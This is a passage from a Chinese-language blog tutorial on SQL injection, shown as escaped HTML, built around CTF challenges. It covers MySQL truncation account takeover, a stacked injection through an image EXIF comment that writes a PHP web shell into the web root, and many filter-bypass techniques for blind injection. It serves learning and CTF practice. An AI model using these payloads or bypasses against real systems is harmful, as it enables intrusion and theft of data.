\"fail\";\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u73b0\u5728\u6211\u4eec\u6ca1\u6709\u7f16\u7801\u6216\u8005\u5355\u5f15\u53f7\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4e3a\u4ec0\u4e48\u8fd8\u53ef\u80fd\u53d1\u751f\u6ce8\u5165\u5462\uff1f\u5173\u952e\u70b9\u5728\u4e8e\u5efa\u8868\u65f6\u6211\u4eec\u9650\u5236\u4e86username\u548cpassword\u7684\u957f\u5ea6\u6700\u5927\u4e3a25\uff0c\u5982\u679c\u6211\u4eec\u63d2\u5165\u7684\u6570\u636e\u957f\u5ea6\u8d85\u8fc725\uff0cMYSQL\u4f1a\u622a\u53d6\u524d\u8fb9\u768425\u4e2a\u5b57\u7b26\u8fdb\u884c\u63d2\u5165\uff0c\u800c\u5bf9\u4e8eselect\u8bf7\u6c42\uff0c\u5373\u4f7f\u67e5\u8be2\u7684\u6570\u636e\u8d85\u8fc725\u4e5f\u4e0d\u4f1a\u4ea7\u751f\u622a\u53d6\uff0c\u6211\u4eec\u8bbe\u60f3\u4e00\u4e2a\u653b\u51fb\u60c5\u666f\uff0c\u6211\u4eec\u6ce8\u518c\u4e00\u4e2a<code>username=admin[25\u4e2a\u7a7a\u683c]x&amp;password=123456<\/code>\u7684\u8d26\u53f7\uff0c\u670d\u52a1\u5668\u9996\u5148\u4f1a\u5224\u65ad\u8fd9\u4e2a\u7528\u6237\u662f\u5426\u5b58\u5728\uff0c\u4f7f\u7528\u7684\u8bed\u53e5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username = <code>'admin&#91;25\u4e2a\u7a7a\u683c]x<\/code>'<\/code><\/pre>\n\n\n\n<p>\u663e\u7136\u662f\u4e0d\u53ef\u80fd\u67e5\u8be2\u51fa\u7ed3\u679c\u7684\uff0c\u4e0d\u4f1a\u5b58\u5728\u8fd9\u4e2a\u7528\u6237\uff0c\u56e0\u6b64\u4f1a\u6210\u529f\u6ce8\u518c\uff0c\u7f51\u7ad9\u5411\u6570\u636e\u5e93\u63d2\u5165\u4e00\u6761\u6570\u636e\uff0c\u7531\u4e8eMYSQL\u4f1a\u622a\u53d6\u524d\u8fb9\u768425\u4e2a\u5b57\u7b26\uff0c\u6240\u4ee5\u76f8\u5f53\u4e8e\u63d2\u5165\u7684\u6570\u636e\u5c31\u662f<code>username=admin&amp;password=123456<\/code> 
,\u7136\u540e\u6211\u4eec\u7528\u5bc6\u7801123456\u5c31\u80fd\u6210\u529f\u767b\u5f55\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9632\u5fa1<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7ed9username\u5b57\u6bb5\u6dfb\u52a0unique\u5c5e\u6027\u3002 <\/li>\n\n\n\n<li>\u4f7f\u7528id\u5b57\u6bb5\u4f5c\u4e3a\u5224\u65ad\u7528\u6237\u7684\u51ed\u8bc1\u3002 <\/li>\n\n\n\n<li>\u63d2\u5165\u6570\u636e\u524d\u5224\u65ad\u6570\u636e\u957f\u5ea6<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">\u6587\u4ef6\u7c7b\u578b\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5982\u679csql\u8bed\u53e5\u6bd4\u8f83\u7279\u6b8a\uff0c\u5373\u4f7f\u662f\u6587\u4ef6\u7c7b\u578b\u4e5f\u53ef\u4ee5\u8fdb\u884c\u6ce8\u5165\u3002\u4ee5ctfshow\u4e0a\u7684\u4f60\u6ca1\u89c1\u8fc7\u7684\u6ce8\u5165\u4e3a\u4f8b\uff0c\u8fd9\u4e2a\u9898\u7684\u4e0a\u4f20\u6587\u4ef6\u7684\u6e90\u7801\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$filename = md5(md5(rand(1,10000))).\".zip\";\n$filetype = (new finfo)-&gt;file($_FILES&#91;'file']&#91;'tmp_name']);\n$filepath = \"upload\/\".$filename;\n$sql = \"INSERT INTO file(filename,filepath,filetype) VALUES ('\".$filename.\"','\".$filepath.\"','\".$filetype.\"');\";\n<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5bf9\u4e8efiletype\u4f7f\u7528\u4e86<code>finfo::file<\/code>\u53d6\u503c\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u83b7\u53d6\u6587\u4ef6\u7684\u5c5e\u6027\uff0c\u5305\u62ec\u56fe\u7247\u7684comment\uff0c\u800c\u4e00\u4e2a\u56fe\u7247\u7684comment\u6211\u4eec\u662f\u53ef\u63a7\u7684\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u5f88\u7b80\u5355\u4e86\uff0c\u6784\u9020\u6076\u610f\u7684comment\u62fc\u63a5sql\u8bed\u53e5\u5199\u9a6c\u5373\u53ef\u3002\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528exiftool\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>exiftool -overwrite_original -comment=\"y1ng\\\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '\/var\/www\/html\/1.php';--+\" 
1.jpg\n<\/code><\/pre>\n\n\n\n<p>\u6211\u8fd9\u91cc\u7528\u4e8616\u8fdb\u5236\u628a\u6076\u610f\u4ee3\u7801\u8f6c\u4e49\u4e86\u4e00\u4e0b\u9632\u6b62\u5f15\u53f7\u6709\u5e72\u6270\uff0c\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u5c31\u662f\u628a1.jpg\u7684comment\u6539\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>y1ng\\\"');select \"&lt;?=`$_POST&#91;0]`;\" into outfile '\/var\/www\/html\/1.php';--+<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u6587\u4ef6\u4e0a\u4f20\u540e\u8bfb\u53d6\u6587\u4ef6\u7684\u5c5e\u6027\uff0c\u5b9e\u9645\u4e0a\u6267\u884c\u7684sql\u8bed\u53e5\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>INSERT INTO file(filename,filepath,filetype) VALUES ('1.jpg','\u6587\u4ef6\u8def\u5f84','y1ng\\\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '\/var\/www\/html\/1.php';--+');<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u7528\u5806\u53e0\u6ce8\u5165\u6210\u529f\u5728\/var\/www\/html\/1.php\u5199\u5165\u4e86&lt;?=`$_POST[0]`\uff0c\u56e0\u6b64\u76f4\u63a5\u57281.php\u75280\u4f20\u53c2\u6267\u884c\u547d\u4ee4\u5373\u53ef(`\u5305\u88f9\u7684\u4ee3\u7801\u5728php\u91cc\u53ef\u4ee5\u76f4\u63a5\u547d\u4ee4\u6267\u884c)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-69.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"839\" height=\"721\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-69.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 
class=\"wp-image-1660\"  sizes=\"auto, (max-width: 839px) 100vw, 839px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">3.Bypass\u6280\u5de7<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u9884\u7f16\u8bd1<\/h1>\n\n\n\n<p>sql\u6ce8\u5165\u5982\u679c\u4e0d\u8c08\u9884\u7f16\u8bd1\u5c31\u5931\u53bb\u4e86\u81f3\u5c11\u4e00\u534a\u7684\u4ef7\u503c\uff0c\u4e13\u95e8\u5355\u5f00\u4e86\u4e00\u7bc7\u6587\u7ae0\u5206\u6790<\/p>\n\n\n\n<p><a href=\"https:\/\/fushuling.com\/index.php\/2023\/10\/27\/%e9%a2%84%e7%bc%96%e8%af%91%e4%b8%8esql%e6%b3%a8%e5%85%a5\/\">\u9884\u7f16\u8bd1\u4e0esql\u6ce8\u5165<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u901a\u7528\u7ed5\u8fc7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u5927\u5c0f\u5199<\/h2>\n\n\n\n<p>\u9996\u5148\u8bb2\u6700\u5e38\u89c1\u7684\u51e0\u4e2a\uff0c\u5982\u679c\u8fd9\u4e2a\u7f51\u7ad9\u7684\u5f00\u53d1\u8005\u6bd4\u8f83\u8822\uff0c\u60f3\u8fc7\u6ee4select\u8fd9\u4e2a\u51fd\u6570\uff0c\u4f46\u4ed6\u662f\u8fd9\u4e48\u5199\u7684\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if (stripos($sql, 'select') !== false) {\n    throw new Exception('Invalid SQL query: SELECT statement not allowed');\n}\n\n\/\/ \u6267\u884c\u67e5\u8be2\u8bed\u53e5\n$result = $db-&gt;query($sql);<\/code><\/pre>\n\n\n\n<p>\u663e\u7136\uff0c\u8fd9\u4e2a\u8fc7\u6ee4\u53ea\u8fc7\u6ee4\u4e86select\u8fd9\u4e2a\u6b21\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5927\u5c0f\u5199\u6bd4\u5982\u53d8\u6210SelEct\u5373\u53ef\u8f7b\u677ebypass<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cc\u5199\u7ed5\u8fc7<\/h2>\n\n\n\n<p>\u5047\u5982\u8fd9\u4e2a\u5f00\u53d1\u8005\u73b0\u5728\u7a0d\u5fae\u806a\u660e\u4e86\u4e00\u70b9\uff0c\u77e5\u9053\u8981\u62c9\u901a\u5339\u914d\u65e0\u8bba\u5927\u5c0f\u5199\uff0c\u4f46\u4ed6\u53ea\u662f\u5355\u7eaf\u7684\u628aselect\u5b57\u7b26\u4e32\u66ff\u6362\u4e3a\u7a7a:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sql = str_ireplace('select', '', $sql); 
#str_ireplace()\u4e0d\u533a\u5206\u5927\u5c0f\u5199<\/code><\/pre>\n\n\n\n<p>\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u53cc\u5199select\u628a\u5b83\u53d8\u6210seselectlect\u5373\u53ef\u8f7b\u677e\u7ed5\u8fc7\uff0c\u56e0\u4e3a\u6700\u540esql\u91cc\u63a5\u6536\u5230\u7684\u662f\u53bb\u9664\u4e86select\u7684\u5b57\u7b26\u4e32\uff0c\u6700\u540e\u8fd8\u662fselect\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6ce8\u91ca\u7b26<\/h2>\n\n\n\n<p>\u8fd9\u91cc\u8bb2\u4e24\u79cd\u5173\u952e\u5b57\u7ed5\u8fc7\u7684\u65b9\u6cd5\uff0c\u7528\u7684\u90fd\u662f\u6ce8\u91ca\u7b26\uff0c\u6bd4\u5982\u7528<code>unio&lt;&gt;n<\/code>\u4ee3\u66ffunion\uff0c\u7528<code>se\/**\/lect<\/code>\u4ee3\u66ffselect\uff0c\u8fd9\u4e24\u79cd\u65b9\u6cd5\u6211\u5728\u5f88\u591a\u6587\u7ae0\u91cc\u90fd\u89c1\u5230\u8fc7\u4e86\uff0c\u4f46\u6211\u5728\u6211\u672c\u5730\u90a3\u4e2aphpmyadmin\u91cc\u5c1d\u8bd5\u5374\u6ca1\u6cd5\u7b49\u6548\u4ee3\u66ff\uff0c\u4f1a\u51fa\u73b0\u62a5\u9519\uff0c\u6682\u65f6\u4e0d\u77e5\u9053\u8fd9\u79cd\u65b9\u6cd5\u7684\u5e94\u7528\u573a\u666f<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u6ce8\u91ca\u7b26<\/h1>\n\n\n\n<p>\u5982\u679c\u6ce8\u91ca\u7b26\u88abban\u4e86\u7684\u8bdd\u6211\u4eec\u5c31\u8981\u60f3\u529e\u6cd5\u95ed\u5408\u540e\u9762\u7684\u8bed\u53e5\u6784\u6210\u6c38\u771f\u3002\u6bd4\u5982\u8fd8\u662f\u8bf4\u5230\u7ea2\u5ca9\u676f\u62ff\u5230sql\u6ce8\u5165\u9898\uff0c\u56e0\u4e3a\u6211\u4eec\u6784\u9020\u7684\u6587\u4ef6\u540e\u9762\u4ee5.doc\u7ed3\u5c3e\uff0c\u6240\u4ee5\u76f4\u63a5\u52a0\u6ce8\u91ca\u7b26\u7684\u8bdd\u4f1a\u5bf9\u8bed\u53e5\u4ea7\u751f\u7834\u574f\uff0c\u8fd9\u65f6\u6211\u4eec\u7684\u9009\u62e9\u4fbf\u662f\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\u540d\u53eb\uff1a\u2019 and 1=2 union select xxx from xxx where \u2018.doc\u2019=\u2019.doc\uff0c\u8fd9\u6837\u6700\u540e\u7684\u5f15\u53f7\u5c31\u4f1a\u53d1\u751f\u95ed\u5408\uff0c\u53d8\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select '1' and 1=2 union select xxx from 
xxx where '.doc' = '.doc'<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u6784\u6210\u6c38\u771f\uff0c\u6bd4\u5982\u8fd9\u4e2a\u53e5\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `sheet1` WHERE \u7528\u6237\u540d=\"$username\"<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u7528&#8221;||&#8221;1\u3001&#8221; or &#8220;1&#8221;=&#8221;1\uff0c\u751a\u81f3\u662f&#8221;union select  1,2,&#8221;3\u8fdb\u884c\u95ed\u5408<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u7a7a\u683c<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u7f16\u7801\u7ed5\u8fc7<\/h2>\n\n\n\n<p>%20 %09 %0a %0b %0c %0d %a0 %00 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5185\u8054\u6ce8\u91ca<\/h2>\n\n\n\n<p>\/**\/  \/*\u5b57\u7b26\u4e32*\/ <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u62ec\u53f7\u7ed5\u8fc7<\/h2>\n\n\n\n<p>\u5373\u6dfb\u52a0\u62ec\u53f7\u4ee3\u66ff\u7a7a\u683c\uff0c\u6bd4\u5982\u6211\u4eec\u7684\u6b63\u5e38\u8bed\u53e5\u4e3a<code>SELECT \u7528\u6237\u540d FROM `sheet1`<\/code>\uff0c\u73b0\u5728\u6211\u4eec\u5c31\u53ef\u4ee5\u6539\u6210<code>SELECT(\u7528\u6237\u540d)FROM(`sheet1`)<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"289\" height=\"270\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1465\"\/><\/div><\/figure>\n\n\n\n<h1 
class=\"wp-block-heading\">\u7ed5\u8fc7\u5f15\u53f7<\/h1>\n\n\n\n<p>\u5728\u6211\u4eecsql\u6ce8\u5165\u7528\u8868\u540d\u67e5\u5217\u540d\u65f6\u4e00\u822c\u90fd\u8981\u7528\u5230\u5f15\u53f7\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(column_name) from information_schema.columns where table_name=\"sheet1\"<\/code><\/pre>\n\n\n\n<p>sheet1\u65c1\u8fb9\u7684\u5f15\u53f7\u4e00\u53bb\u6389\u5c31\u4f1a\u62a5\u9519\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u628asheet1\u8fd9\u4e2a\u8868\u540d\u8f6c\u4e3a16\u8fdb\u5236\u5b57\u7b26\u4e32\uff0c\u8fd9\u6837\u5c31\u4e0d\u7528\u4f7f\u7528\u5f15\u53f7\u4e86\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"855\" height=\"227\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1468\"  sizes=\"auto, (max-width: 855px) 100vw, 855px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u9017\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">from 
to<\/h2>\n\n\n\n<p>\u76f2\u6ce8\u7684\u65f6\u5019\u4e3a\u4e86\u622a\u53d6\u5b57\u7b26\u4e32\uff0c\u6211\u4eec\u5f80\u5f80\u4f1a\u4f7f\u7528substr(),mid()\u3002\u8fd9\u4e9b\u5b50\u53e5\u65b9\u6cd5\u90fd\u9700\u8981\u4f7f\u7528\u5230\u9017\u53f7\uff0c\u5bf9\u4e8esubstr()\u548cmid()\u8fd9\u4e24\u4e2a\u65b9\u6cd5\u53ef\u4ee5\u4f7f\u7528from to\u7684\u65b9\u5f0f\u6765\u89e3\u51b3\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select substr(database() from 1 for 1);\nselect mid(database() from 1 for 1);<\/code><\/pre>\n\n\n\n<p>\u7b49\u4ef7\u4e8emid\/substr(database(),1,1)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528join<\/h2>\n\n\n\n<p>select 1,2\u7b49\u4ef7\u4e8eselect * from (select 1)a join (select 2)b<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528like<\/h2>\n\n\n\n<p>select ascii(mid(user(),1,1))=114\u7b49\u4ef7\u4e8eselect user() like &#8216;r%&#8217;\uff0c\u5373\u9010\u4e2a\u5b57\u7b26\u4e32\u6bd4\u8f83\uff0c\u6211\u4eec\u53ef\u4ee5\u66b4\u529b\u7834\u89e3%\u524d\u7684\u5b57\u7b26\u4e32\uff0c\u76f4\u5230\u7206\u7834\u51faselect user() like &#8216;root@localhost&#8217;\uff0c\u5f97\u5230\u771f\u6b63\u7684\u7528\u6237\u540d<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528offset<\/h2>\n\n\n\n<p>\u76f2\u6ce8\u7684\u65f6\u5019\u9664\u4e86substr()\u548cmid()\u9700\u8981\u4f7f\u7528\u9017\u53f7\uff0climit\u4e5f\u4f1a\u4f7f\u7528\u9017\u53f7\uff0c\u6bd4\u5982\u8bed\u53e5<code>select * from sheet1 limit 0,1 <\/code>,\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528<code>select * from sheet1 limit 1 offset 0<\/code> \u7b49\u6548\u66ff\u4ee3<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u6bd4\u8f83\u7b26\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">greatest()\u3001least()<\/h2>\n\n\n\n<p>\u6709\u65f6\u5019\u6211\u4eec\u5199\u811a\u672c\u4f1a\u7528\u5230\u4e8c\u5206\u6cd5\uff0c\u7279\u522b\u662f\u76f2\u6ce8\u7684\u65f6\u5019\uff0c\u6bd4\u5982\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 
where \u7528\u6237\u540d=\"admin\" and ascii(substr(database(),1,1))&gt;64<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u540e\u9762\u7684\u6761\u4ef6\u6210\u7acbdatabase\u540d\u79f0\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26ascii\u7801\u5927\u4e8e64\uff0c\u8bed\u53e5\u5219\u4f1a\u6709\u6b63\u5e38\u56de\u663e\uff0c\u8fd9\u65f6\u5982\u679c\u5927\u4e8e\u53f7\u5c0f\u4e8e\u53f7\u90fd\u88abban\u4e86\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528greatest()\u3001least()\u8fdb\u884c\u4ee3\u66ff\uff0c\u5982\u4ee5greatest(n1,n2,n3,\u2026)\u4e3a\u4f8b\uff0c\u5b83\u4f1a\u8fd4\u56de\u8fd9\u4e9b\u5b57\u7b26\u91cc\u7684\u6700\u5927\u503c\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u4e0a\u9762\u7684\u8bed\u53e5\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and greatest(ascii(substr(database(),1,1)),64)=64<\/code><\/pre>\n\n\n\n<p>\u4f5c\u7528\u548c\u4e0a\u9762\u76f8\u540c\uff0c\u5982\u679cdatabase\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e0d\u662f\u8fd9\u91cc\u6700\u5927\u7684\u5219\u4f1a\u8fd4\u56de64\uff0cand\u540e\u9762\u6210\u7acb\uff0c\u53cd\u4e4b\u82e5\u5927\u4e8e64\u540e\u9762\u7684\u5f0f\u5b50\u4e0d\u6ee1\u8db3\u4e5f\u5c31\u4e0d\u4f1a\u6709\u56de\u663e\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">between\u6ce8\u5165<\/h2>\n\n\n\n<p>\u8fd8\u662f\u8fd9\u4e2a\u8bed\u53e5\uff1aselect * from sheet1 where \u7528\u6237\u540d=&#8221;admin&#8221; and ascii(substr(database(),1,1))&gt;64\uff0c\u5176\u5b9e\u6211\u4eec\u4e5f\u53ef\u4ee5\u7528between\u5224\u65addatabase()\u9996\u4f4d\u5b57\u7b26\u7684\u5927\u5c0f\uff0c\u6bd4\u5982\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and ascii(substr(database(),1,1)) between 64 and 128 
<\/code><\/pre>\n\n\n\n<p>\u4e5f\u5c31\u662f\u628a\u903b\u8f91\u6539\u6210\u5224\u65adascii\u503c\u662f\u5426\u572864\u548c128\u4e4b\u95f4\uff0c\u5373\u662f\u5426\u5927\u4e8e64\uff0c\u5982\u679c\u60f3\u4f7f\u7528\u5c0f\u4e8e\u4e5f\u53ef\u4ee5\u8fd9\u4e48\u5224\u65ad\uff0c\u7a0d\u5fae\u6539\u6539\u5373\u53ef\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7or and xor not<\/h1>\n\n\n\n<pre class=\"wp-block-code\"><code>and=&amp;&amp;\nor=|| \nxor=^\nnot=!<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\" id=\"h3-23\">\u7ed5\u8fc7\u7b49\u4e8e\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u6bd4\u8f83\u7b26<\/h2>\n\n\n\n<p>\u5c31\u662f\u7528\u4e8c\u5206\u7684\u65b9\u5f0f\u627e\u5230\u786e\u5207\u503c\u5373\u53ef\uff0c\u4e0a\u9762\u8fd8\u6709\u66ff\u6362\u6bd4\u8f83\u7b26\u7684\u4e00\u4e9b\u65b9\u6cd5<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">like <\/h2>\n\n\n\n<p>like\u6709\u4e24\u4e2a\u6a21\u5f0f\uff1a_\u548c%<\/p>\n\n\n\n<p>_\uff1a\u8868\u793a\u5355\u4e2a\u5b57\u7b26\uff0c\u7528\u6765\u67e5\u8be2\u5b9a\u957f\u7684\u6570\u636e<\/p>\n\n\n\n<p>%\uff1a\u8868\u793a0\u4e2a\u6216\u591a\u4e2a\u4efb\u610f\u5b57\u7b26<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\uff081\uff09SELECT * FROM Persons  WHERE City LIKE 'N%'     \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4ee5 \"N\" \u5f00\u59cb\u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff082\uff09SELECT * FROM Persons  WHERE City LIKE '%g'     \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4ee5 \"g\" \u7ed3\u5c3e\u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff083\uff09SELECT * FROM Persons   WHERE City LIKE '%lon%'  \u4ece \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u5305\u542b \"lon\" \u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff084\uff09SELECT * FROM Persons   WHERE City NOT LIKE '%lon%'  \u4ece \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4e0d\u5305\u542b \"lon\" \u7684\u57ce\u5e02\u91cc\u7684\u4eba<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u8bed\u53e5<code>SELECT * FROM `test` 
where id =1 and (substr(database(),1,1)=\"t\")<\/code>\u53ef\u4ee5\u7b49\u6548\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `test` where id =1 and (database() like \"t%\")<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">rlike \u3001regexp<\/h2>\n\n\n\n<p>\u8fd9\u4fe9\u5c31\u662f\u4eb2\u5144\u5f1f\uff0c\u7528\u6cd5\u4e00\u6837\u7684\uff0c\u4e3b\u8981\u4f5c\u7528\u5c31\u662f\u52a0\u4e86\u6b63\u5219\u5339\u914d\u7684\u76f8\u5173\u7528\u6cd5<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>1\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u5305\u542b\u67d0\u5173\u952e\u5b57\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u5305\u542b\u201c\u5e0c\u671b\u201d\u7684\u4fe1\u606f\uff1aselect * from student where name rlike &#8216;\u5e0c\u671b&#8217;<br><br><strong>2\u3001\u6a21\u7cca\u67e5\u8be2\u67d0\u5b57\u6bb5\u4e2d\u4e0d\u5305\u542b\u67d0\u5173\u952e\u5b57\u4fe1\u606f\u3002<br><\/strong>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4e0d\u5305\u542b\u201c\u5e0c\u671b\u201d\u7684\u4fe1\u606f\uff1aselect * from student where name not rlike &#8216;\u5e0c\u671b&#8217;<br><br><strong>3\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u4ee5\u67d0\u5173\u952e\u5b57\u5f00\u5934\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4ee5\u201c\u5927\u201d\u5f00\u5934\u7684\u4fe1\u606f\uff1aselect * from student where name  rlike &#8216;^\u5927&#8217;<br><br><strong>4\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u4ee5\u67d0\u5173\u952e\u5b57\u7ed3\u5c3e\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4ee5\u201c\u5927\u201d\u7ed3\u5c3e\u7684\u4fe1\u606f\uff1aselect * from student where name 